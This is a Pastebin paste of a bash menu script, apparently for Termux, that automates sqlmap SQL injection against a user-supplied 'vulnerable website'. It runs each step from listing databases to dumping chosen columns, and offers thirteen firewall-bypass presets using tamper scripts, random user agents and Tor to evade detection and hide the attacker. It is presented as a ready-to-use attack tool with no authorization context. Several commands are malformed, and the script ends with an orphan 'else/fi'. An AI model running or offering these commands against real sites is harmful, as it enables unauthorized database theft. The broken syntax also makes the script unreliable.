Paceusa

SQLMAP Cheats

Apr 24th, 2024
71
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. #!/data/data/com.termux/files/usr/bin/bash
  2. git clone https://github.com/sqlmapproject/sqlmap
  3. cp logo.sh sqlmap
  4. cd sqlmap
  5. echo ""
  6. PS3='Please enter your choice: '
  7. options=("Normal injection" "Waf bypass 1" "Waf bypass 2" "Waf bypass 3" "Waf bypass 4" "Waf bypass 5" "Waf bypass 6" "Waf bypass 7" "Waf bypass 8" "Waf bypass 9" "Waf bypass 10" "Waf bypass 11" "Waf bypass 12" "Waf bypass 13" "Wizard mode" "Quit")
  8. select opt in "${options[@]}"
  9. do
  10.     case $opt in
  11.         "Normal injection")
  12.     echo "Enter vulnerable website link :"
  13.     read site
  14.     python2 sqlmap.py -u $site --dbs
  15.     echo "Enter the name of the database you got from sqlmap"
  16.     read db
  17.     python2 sqlmap.py -u $site -D $db --tables
  18.     echo "enter the table to view its columns"
  19.     read tb
  20.     python2 sqlmap.py -u $site -D $db -T $tb --columns
  21.     echo "Enter the column to dump data use , (comma) for multiple columns :"
  22.     read col
  23.     python2 sqlmap.py -u $site -D $db -T $tb -C $col --dump
  24.             ;;
  25.         "Waf bypass 1")
  26.             echo "Enter vulnerable website link :"
  27.             read site
  28.             python2 sqlmap.py -u "$site" --level=5 --risk=3 --random-agent --user-agent -v3 --batch --threads=10 --dbs
  29.             echo "Enter the name of the database you got from sqlmap"
  30.             read db
  31.             python2 sqlmap.py -u "$site" --level=5 --risk=3 --random-agent --user-agent -v3 --batch --threads=10 -D $db --tables
  32.             echo "enter the table to view its columns"
  33.             read tb
  34.             python2 sqlmap.py -u "$site" --level=5 --risk=3 --random-agent --user-agent -v3 --batch --threads=10 -D $db -T $tb --columns
  35.             echo "Enter the column to dump data use , (comma) for multiple columns :"
  36.             read col
  37.             python2 sqlmap.py -u "$site" --level=5 --risk=3 --random-agent --user-agent -v3 --batch --threads=10 -D $db -T $tb -C $col --dump
  38.             ;;
  39.         "Waf bypass 2")
  40.             echo "Enter vulnerable website link :"
  41.             read site
  42.             python2 sqlmap.py -u "$site" --dbms="MySQL" -v3 --technique U --tamper="space2mysqlblank.py" --dbs
  43.             echo "Enter the name of the database you got from sqlmap"
  44.             read db
  45.             python2 sqlmap.py -u "$site" --dbms="MySQL" -v3 --technique U --tamper="space2mysqlblank.py" -D $db --tables
  46.             echo "enter the table to view its columns"
  47.             read tb
  48.             python2 sqlmap.py -u "$site" --dbms="MySQL" -v3 --technique U --tamper="space2mysqlblank.py" -D $db -T $tb --columns
  49.             echo "Enter the column to dump data use , (comma) for multiple columns :"
  50.             read col
  51.             python2 sqlmap.py -u "$site" --dbms="MySQL" -v3 --technique U --tamper="space2mysqlblank.py" -D $db -T $tb -C $col --dump
  52.             ;;
  53.             "Waf bypass 3")
  54.             echo "Enter vulnerable website link :"
  55.             read site
  56.             python2 sqlmap.py -u "$site" --dbms="MySQL" -v3 --technique U --tamper="space2comment" --dbs
  57.             echo "Enter the name of the database you got from sqlmap"
  58.             read db
  59.             python2 sqlmap.py -u "$site" --dbms="MySQL" -v3 --technique U --tamper="space2comment" -D $db --tables
  60.             echo "enter the table to view its columns"
  61.             read tb
  62.             python2 sqlmap.py -u "$site" --dbms="MySQL" -v3 --technique U --tamper="space2comment" -D $db -T $tb --columns
  63.             echo "Enter the column to dump data use , (comma) for multiple columns :"
  64.             read col
  65.             python2 sqlmap.py -u "$site" --dbms="MySQL" -v3 --technique U --tamper="space2comment"  -D $db -T $tb -C $col --dump
  66.             ;;
  67.             "Waf bypass 4")
  68.             echo "Enter vulnerable website link :"
  69.             read site
  70.             python2 sqlmap.py -u "$site" -v3 --technique=T --no-cast --fresh-queries --banner --dbs
  71.             echo "Enter the name of the database you got from sqlmap"
  72.             read db
  73.             python2 sqlmap.py -u "$site" -v3 --technique=T --no-cast --fresh-queries --banner -D $db --tables
  74.             echo "enter the table to view its columns"
  75.             read tb
  76.             python2 sqlmap.py -u "$site" -v3 --technique=T --no-cast --fresh-queries --banner -D $db -T $tb --columns
  77.             echo "Enter the column to dump data use , (comma) for multiple columns :"
  78.             read col
  79.             python2 sqlmap.py -u "$site" -v3 --technique=T --no-cast --fresh-queries --banner -D $db -T $tb -C $col --dump
  80.             ;;
  81.             "Waf bypass 5")
  82.             echo "Enter vulnerable website link :"
  83.             read site
  84.             python2 sqlmap.py -u "$site" --identify-waf --random-agent -v 3 --tamper="between,randomcase,space2comment" --dbs
  85.             echo "Enter the name of the database you got from sqlmap"
  86.             read db
  87.             python2 sqlmap.py -u "$site" --identify-waf --random-agent -v 3 --tamper="between,randomcase,space2comment" -D $db --tables
  88.             echo "enter the table to view its columns"
  89.             read tb
  90.             python2 sqlmap.py -u "$site" --identify-waf --random-agent -v 3 --tamper="between,randomcase,space2comment" -D $db -T $tb --columns
  91.             echo "Enter the column to dump data use , (comma) for multiple columns :"
  92.             read col
  93.             python2 sqlmap.py -u "$site" --identify-waf --random-agent -v 3 --tamper="between,randomcase,space2comment" -D $db -T $tb -C $col --dump
  94.             ;;
  95.             "Waf bypass 6")
  96.             echo "Enter vulnerable website link :"
  97.             read site
  98.             python2 sqlmap.py -u "$site" --parse-errors -v 3 --current-user --is-dba --banner -D eeaco_gm -T #__tabulizer_user_preferences --column --random-agent --level=5 --risk=3 --dbs
  99.             echo "Enter the name of the database you got from sqlmap"
  100.             read db
  101.             python2 sqlmap.py -u "$site" --parse-errors -v 3 --current-user --is-dba --banner -D eeaco_gm -T #__tabulizer_user_preferences --column --random-agent --level=5 --risk=3 -D $db --tables
  102.             echo "enter the table to view its columns"
  103.             read tb
  104.             python2 sqlmap.py -u "$site" --parse-errors -v 3 --current-user --is-dba --banner -D eeaco_gm -T #__tabulizer_user_preferences --column --random-agent --level=5 --risk=3 -D $db -T $tb --columns
  105.             echo "Enter the column to dump data use , (comma) for multiple columns :"
  106.             read col
  107.             python2 sqlmap.py -u "$site" --parse-errors -v 3 --current-user --is-dba --banner -D eeaco_gm -T #__tabulizer_user_preferences --column --random-agent --level=5 --risk=3 -D $db -T $tb -C $col --dump
  108.             ;;
  109.             "Waf bypass 7")
  110.             echo "Enter vulnerable website link :"
  111.             read site
  112.             python2 sqlmap.py -u "$site" --tamper=between,modsecurityversioned,modsecurityzeroversioned,charencode,greatest --identify-waf --random-agent --dbs
  113.             echo "Enter the name of the database you got from sqlmap"
  114.             read db
  115.             python2 sqlmap.py -u "$site" --tamper=between,modsecurityversioned,modsecurityzeroversioned,charencode,greatest --identify-waf --random-agent -D $db --tables
  116.             echo "enter the table to view its columns"
  117.             read tb
  118.             python2 sqlmap.py -u "$site" --tamper=between,modsecurityversioned,modsecurityzeroversioned,charencode,greatest --identify-waf --random-agent -D $db -T $tb --columns
  119.             echo "Enter the column to dump data use , (comma) for multiple columns :"
  120.             read col
  121.             python2 sqlmap.py -u "$site" --tamper=between,modsecurityversioned,modsecurityzeroversioned,charencode,greatest --identify-waf --random-agent -D $db -T $tb -C $col --dump
  122.             ;;
  123.             "Waf bypass 8")
  124.             echo "Enter vulnerable website link :"
  125.             read site
  126.             python2 sqlmap.py -u "$site" --banner --safe-url=2 --safe-freq=3 --tamper=between,randomcase,charencode -v 3 --force-ssl --dbs --threads=10 --level=2 --risk=2 --dbs
  127.             echo "Enter the name of the database you got from sqlmap"
  128.             read db
  129.             python2 sqlmap.py -u "$site" --banner --safe-url=2 --safe-freq=3 --tamper=between,randomcase,charencode -v 3 --force-ssl --dbs --threads=10 --level=2 --risk=2 -D $db --tables
  130.             echo "enter the table to view its columns"
  131.             read tb
  132.             python2 sqlmap.py -u "$site" --banner --safe-url=2 --safe-freq=3 --tamper=between,randomcase,charencode -v 3 --force-ssl --dbs --threads=10 --level=2 --risk=2 -D $db -T $tb --columns
  133.             echo "Enter the column to dump data use , (comma) for multiple columns :"
  134.             read col
  135.             python2 sqlmap.py -u "$site" --banner --safe-url=2 --safe-freq=3 --tamper=between,randomcase,charencode -v 3 --force-ssl --dbs --threads=10 --level=2 --risk=2 -D $db -T $tb -C $col --dump
  136.             ;;
  137.             "Waf bypass 9")
  138.             echo "Enter vulnerable website link :"
  139.             read site
  140.             python2 sqlmap.py -u "$site" --level=5 --risk=3 --random-agent --tamper=between,charencode,charunicodeencode,equaltolike,greatest,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,sp_password,space2comment,space2dash,space2mssqlblank,space2mysqldash,space2plus,space2randomblank,unionalltounion,unmagicquotes --dbms=mssql --dbs
  141.             echo "Enter the name of the database you got from sqlmap"
  142.             read db
  143.             python2 sqlmap.py -u "$site" --level=5 --risk=3 --random-agent --tamper=between,charencode,charunicodeencode,equaltolike,greatest,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,sp_password,space2comment,space2dash,space2mssqlblank,space2mysqldash,space2plus,space2randomblank,unionalltounion,unmagicquotes --dbms=mssql -D $db --tables
  144.             echo "enter the table to view its columns"
  145.             read tb
  146.             python2 sqlmap.py -u "$site" --level=5 --risk=3 --random-agent --tamper=between,charencode,charunicodeencode,equaltolike,greatest,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,sp_password,space2comment,space2dash,space2mssqlblank,space2mysqldash,space2plus,space2randomblank,unionalltounion,unmagicquotes --dbms=mssql -D $db -T $tb --columns
  147.             echo "Enter the column to dump data use , (comma) for multiple columns :"
  148.             read col
  149.             python2 sqlmap.py -u "$site" --level=5 --risk=3 --random-agent --tamper=between,charencode,charunicodeencode,equaltolike,greatest,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,sp_password,space2comment,space2dash,space2mssqlblank,space2mysqldash,space2plus,space2randomblank,unionalltounion,unmagicquotes --dbms=mssql -D $db -T $tb -C $col --dump
  150.             ;;
  151.             "Waf bypass 10")
  152.             echo "Enter vulnerable website link :"
  153.             read site
  154.             python2 sqlmap.py -u "$site" --level 5 --risk 3 tamper=between,bluecoat,charencode,charunicodeencode,concat2concatws,equaltolike,greatest,halfversionedmorekeywords,ifnull2ifisnull,modsecurityversioned,modsecurityzeroversioned,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,space2comment,space2hash,space2morehash,space2mysqldash,space2plus,space2randomblank,unionalltounion,unmagicquotes,versionedkeywords,versionedmorekeywords,xforwardedfor --dbms=mssql --dbs
  155.             echo "Enter the name of the database you got from sqlmap"
  156.             read db
  157.             python2 sqlmap.py -u "$site" --level 5 --risk 3 tamper=between,bluecoat,charencode,charunicodeencode,concat2concatws,equaltolike,greatest,halfversionedmorekeywords,ifnull2ifisnull,modsecurityversioned,modsecurityzeroversioned,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,space2comment,space2hash,space2morehash,space2mysqldash,space2plus,space2randomblank,unionalltounion,unmagicquotes,versionedkeywords,versionedmorekeywords,xforwardedfor --dbms=mssql -D $db --tables
  158.             echo "enter the table to view its columns"
  159.             read tb
  160.             python2 sqlmap.py -u "$site" --level 5 --risk 3 tamper=between,bluecoat,charencode,charunicodeencode,concat2concatws,equaltolike,greatest,halfversionedmorekeywords,ifnull2ifisnull,modsecurityversioned,modsecurityzeroversioned,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,space2comment,space2hash,space2morehash,space2mysqldash,space2plus,space2randomblank,unionalltounion,unmagicquotes,versionedkeywords,versionedmorekeywords,xforwardedfor --dbms=mssql -D $db -T $tb --columns
  161.             echo "Enter the column to dump data use , (comma) for multiple columns :"
  162.             read col
  163.             python2 sqlmap.py -u "$site" --level 5 --risk 3 tamper=between,bluecoat,charencode,charunicodeencode,concat2concatws,equaltolike,greatest,halfversionedmorekeywords,ifnull2ifisnull,modsecurityversioned,modsecurityzeroversioned,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,space2comment,space2hash,space2morehash,space2mysqldash,space2plus,space2randomblank,unionalltounion,unmagicquotes,versionedkeywords,versionedmorekeywords,xforwardedfor --dbms=mssql -D $db -T $tb -C $col --dump
  164.             ;;
  165.             "Waf bypass 11")
  166.             echo "Enter vulnerable website link :"
  167.             read site
  168.             python2 sqlmap.py -u "$site" --level 5 --risk 3 tamper=apostrophemask,apostrophenullencode,base64encode,between,chardoubleencode,charencode,charunicodeencode,equaltolike,greatest,ifnull2ifisnull,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,space2comment,space2plus,space2randomblank,unionalltounion,unmagicquotes --dbms=mssql --dbs
  169.             echo "Enter the name of the database you got from sqlmap"
  170.             read db
  171.             python2 sqlmap.py -u "$site" --level 5 --risk 3 tamper=apostrophemask,apostrophenullencode,base64encode,between,chardoubleencode,charencode,charunicodeencode,equaltolike,greatest,ifnull2ifisnull,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,space2comment,space2plus,space2randomblank,unionalltounion,unmagicquotes --dbms=mssql -D $db --tables
  172.             echo "enter the table to view its columns"
  173.             read tb
  174.             python2 sqlmap.py -u "$site" --level 5 --risk 3 tamper=apostrophemask,apostrophenullencode,base64encode,between,chardoubleencode,charencode,charunicodeencode,equaltolike,greatest,ifnull2ifisnull,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,space2comment,space2plus,space2randomblank,unionalltounion,unmagicquotes --dbms=mssql -D $db -T $tb --columns
  175.             echo "Enter the column to dump data use , (comma) for multiple columns :"
  176.             read col
  177.             python2 sqlmap.py -u "$site" --level 5 --risk 3 tamper=apostrophemask,apostrophenullencode,base64encode,between,chardoubleencode,charencode,charunicodeencode,equaltolike,greatest,ifnull2ifisnull,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,space2comment,space2plus,space2randomblank,unionalltounion,unmagicquotes --dbms=mssql -D $db -T $tb -C $col --dump
  178.             ;;
  179.             "Waf bypass 12")
  180.             echo "Enter vulnerable website link :"
  181.             read site
  182.             python2 sqlmap.py -u "$site" --level=5 --risk=3 -p "id"-tamper="apostrophemask,apostrophenullencode,appendnullbyte,base64encode,between,bluecoat,chardoubleencode,charencode,charunicodeencode,concat2concatws,equaltolike,greatest,halfversionedmorekeywords,ifnull2ifisnull,modsecurityversioned,modsecurityzeroversioned,multiplespaces,nonrecursivereplacement,percentage,randomcase,randomcomments,securesphere,space2comment,space2dash,space2hash,space2morehash,space2mssqlblank,space2mssqlhash,space2mysqlblank,space2mysqldash,space2plus,space2randomblank,sp_password,unionalltounion,unmagicquotes,versionedkeywords,versionedmorekeywords" --dbs
  183.             echo "Enter the name of the database you got from sqlmap"
  184.             read db
  185.             python2 sqlmap.py -u "$site" --level=5 --risk=3 -p "id"-tamper="apostrophemask,apostrophenullencode,appendnullbyte,base64encode,between,bluecoat,chardoubleencode,charencode,charunicodeencode,concat2concatws,equaltolike,greatest,halfversionedmorekeywords,ifnull2ifisnull,modsecurityversioned,modsecurityzeroversioned,multiplespaces,nonrecursivereplacement,percentage,randomcase,randomcomments,securesphere,space2comment,space2dash,space2hash,space2morehash,space2mssqlblank,space2mssqlhash,space2mysqlblank,space2mysqldash,space2plus,space2randomblank,sp_password,unionalltounion,unmagicquotes,versionedkeywords,versionedmorekeywords" -D $db --tables
  186.             echo "enter the table to view its columns"
  187.             read tb
  188.             python2 sqlmap.py -u "$site" --level=5 --risk=3 -p "id"-tamper="apostrophemask,apostrophenullencode,appendnullbyte,base64encode,between,bluecoat,chardoubleencode,charencode,charunicodeencode,concat2concatws,equaltolike,greatest,halfversionedmorekeywords,ifnull2ifisnull,modsecurityversioned,modsecurityzeroversioned,multiplespaces,nonrecursivereplacement,percentage,randomcase,randomcomments,securesphere,space2comment,space2dash,space2hash,space2morehash,space2mssqlblank,space2mssqlhash,space2mysqlblank,space2mysqldash,space2plus,space2randomblank,sp_password,unionalltounion,unmagicquotes,versionedkeywords,versionedmorekeywords" -D $db -T $tb --columns
  189.             echo "Enter the column to dump data use , (comma) for multiple columns :"
  190.             read col
  191.             python2 sqlmap.py -u "$site" --level=5 --risk=3 -p "id"-tamper="apostrophemask,apostrophenullencode,appendnullbyte,base64encode,between,bluecoat,chardoubleencode,charencode,charunicodeencode,concat2concatws,equaltolike,greatest,halfversionedmorekeywords,ifnull2ifisnull,modsecurityversioned,modsecurityzeroversioned,multiplespaces,nonrecursivereplacement,percentage,randomcase,randomcomments,securesphere,space2comment,space2dash,space2hash,space2morehash,space2mssqlblank,space2mssqlhash,space2mysqlblank,space2mysqldash,space2plus,space2randomblank,sp_password,unionalltounion,unmagicquotes,versionedkeywords,versionedmorekeywords" -D $db -T $tb -C $col --dump
  192.             ;;
  193.             "Waf bypass 13")
  194.             echo "Enter vulnerable website link :"
  195.             read site
  196.             python2 sqlmap.py -u "$site" --tamper "randomcase.py" --tor --tor-type=SOCKS5 --tor-port=9050 --dbs --dbms "MySQL" --current-db --random-agent --dbs
  197.             echo "Enter the name of the database you got from sqlmap"
  198.             read db
  199.             python2 sqlmap.py -u "$site" --tamper "randomcase.py" --tor --tor-type=SOCKS5 --tor-port=9050 --dbs --dbms "MySQL" --current-db --random-agent -D $db --tables
  200.             echo "enter the table to view its columns"
  201.             read tb
  202.             python2 sqlmap.py -u "$site" --tamper "randomcase.py" --tor --tor-type=SOCKS5 --tor-port=9050 --dbs --dbms "MySQL" --current-db --random-agent -D $db -T $tb --columns
  203.             echo "Enter the column to dump data use , (comma) for multiple columns :"
  204.             read col
  205.             python2 sqlmap.py -u "$site" --tamper "randomcase.py" --tor --tor-type=SOCKS5 --tor-port=9050 --dbs --dbms "MySQL" --current-db --random-agent -D $db -T $tb -C $col --dump
  206.             ;;
  207.             "Wizard mode")
  208.             cd sqlmap
  209.             python2 sqlmap.py --wizard
  210.             ;;
  211.         "Quit")
  212.         echo "Thankyou for using my tool :)"
  213.         echo "Yell Phone Naing"
  214.             break
  215.             ;;
  216.         *) echo "invalid option $REPLY";;
  217.     esac
  218. done   
  219. else
  220. echo "Dude you are drunk !! select a valid option mate"
  221. fi
Add Comment
Please, Sign In to add comment